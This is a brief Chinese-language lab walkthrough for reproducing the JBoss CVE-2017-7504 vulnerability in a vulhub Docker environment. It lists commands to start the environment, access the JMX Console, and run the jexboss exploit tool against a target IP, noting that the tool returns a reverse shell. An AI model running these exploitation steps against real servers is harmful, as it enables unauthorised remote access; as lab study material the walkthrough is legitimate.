1. 环境搭建
https://www.cnblogs.com/chengNo1/p/14297387.html
搭建好vulhub平台后
进入对应漏洞目录
cd vulhub/jboss/CVE-2017-7504/
开启环境
docker-compose up -d
2. 访问 http://172.16.12.15:8080/ 进入后台。点击JMX Console
3. 漏洞利用工具
1、下载地址:https://github.com/joaomatosf/jexboss
2、cd jexboss
3、python3 jexboss.py //会弹出该工具使用方法
4、python3 jexboss.py -u 192.168.77.136:8080
5、输入yes会反弹一个shell 回来